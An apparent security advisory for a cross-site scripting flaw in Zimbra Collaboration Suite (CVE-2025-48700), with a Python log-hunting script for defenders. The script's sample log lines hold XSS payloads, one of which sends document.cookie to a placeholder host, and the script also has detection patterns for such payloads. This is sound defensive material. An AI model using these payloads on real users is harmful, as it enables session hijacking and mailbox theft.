CVE-2025-48700: Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability

Summary

A cross-site scripting (XSS) vulnerability has been identified in Synacor Zimbra Collaboration Suite (ZCS). The flaw lets an attacker inject JavaScript that runs in a victim's browser inside their authenticated ZCS session, which can expose session data and mailbox content to the attacker. Under CISA's Known Exploited Vulnerabilities (KEV) requirements, federal agencies must apply the vendor's fix or mitigations by April 23, 2026, or discontinue use of the product if none are available.

IFF Assessment

FOE

This vulnerability allows an attacker to run arbitrary JavaScript in a victim's browser within their ZCS session, a direct threat to the confidentiality and integrity of that user's data and account.

Severity

6.1 Medium

The vulnerability allows cross-site scripting, which can lead to unauthorized access to sensitive information and further compromise of the user's session. A 6.1 Medium is consistent with the standard CVSS v3.1 scoring of a reflected XSS: network-reachable and low complexity, but requiring user interaction (the victim must open an attacker-crafted link or message) and limited to a low-impact loss of confidentiality and integrity within one session. The score alone understates the practical priority here: this CVE is listed in CISA's KEV catalog as actively exploited, and web-mail XSS is a well-worn route to session theft and mailbox access.

CISA KEV: Listed as actively exploited. Federal patch due: April 23, 2026. Known ransomware use: Unknown.

Defender Context

This XSS vulnerability in a widely used collaboration suite requires immediate attention. Defenders should identify their ZCS version, apply the vendor's patch or mitigations as soon as they are available, and in the meantime review web server access logs for requests carrying script-like payloads in URL parameters (encoded or double-encoded tags, javascript: URIs, event-handler attributes). Because the page does not describe the specific injection point, hunting should be generic rather than tied to a single parameter, and any hit should be cross-checked against the affected user's subsequent session activity.
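The log-hunting step above, as an added example that is not part of this advisory and not Zimbra's own tooling: a small Python scanner that fully URL-decodes the request target of each Common/Combined Log Format line and flags generic XSS indicators. The log lines are constructed for illustration, and the indicator list is deliberately generic because the page does not describe the actual injection point of CVE-2025-48700.

```python
"""Hunt for XSS-style payloads in web server access logs.

Added illustration only. The sample log lines below are constructed,
not real Zimbra traffic, and the indicators are generic XSS markers
rather than a signature for CVE-2025-48700's (undisclosed) parameter.
"""
import re
from urllib.parse import unquote, unquote_plus

# Common/Combined Log Format as written by Apache, nginx and Jetty-style servers.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators keyed by a short label; matched case-insensitively against the
# fully URL-decoded request target.
INDICATORS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(
        r"\bon(error|load|click|mouseover|focus|blur|input|submit|toggle)\s*=", re.I),
    "html_injection": re.compile(r"<\s*(iframe|img|svg|object|embed|math|body)\b", re.I),
    "dom_access": re.compile(r"document\s*\.\s*(cookie|location|domain)", re.I),
}

# Constructed sample lines (TEST-NET-3 address used for the exfil host).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2026:10:12:01 +0000] "GET /zimbra/?app=mail HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Mar/2026:10:12:07 +0000] "GET /zimbra/h/search?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Mar/2026:10:12:09 +0000] "GET /zimbra/?x=%22%20onerror%3D%22fetch('//203.0.113.7/'%2Bdocument.cookie) HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
10.0.0.3 - - [17/Mar/2026:10:13:00 +0000] "GET /zimbra/?q=javascript:alert(1) HTTP/1.1" 200 100 "-" "Mozilla/5.0"
10.0.0.4 - - [17/Mar/2026:10:14:00 +0000] "GET /zimbra/?msg=see+the+description HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing, to catch double encoding.

    The first pass treats '+' as a space (form encoding); later passes only
    undo %XX so a literal '+' produced by %2B is preserved.
    """
    s = unquote_plus(s)
    for _ in range(max_rounds - 1):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log(log_text: str) -> list[dict]:
    """Return one finding per request whose decoded target trips an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        decoded = fully_decode(m["target"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "target": m["target"], "decoded": decoded, "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} "
              f"{','.join(f['indicators'])}  {f['decoded']}")
```

Decoding before matching matters: the second and third sample lines carry their angle brackets and quotes percent-encoded, so a raw substring search for `<script` would miss them, while the benign `description` in the last line does not trip the tag pattern. Treat hits as leads to correlate with that user's later session activity, not as confirmation of exploitation.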
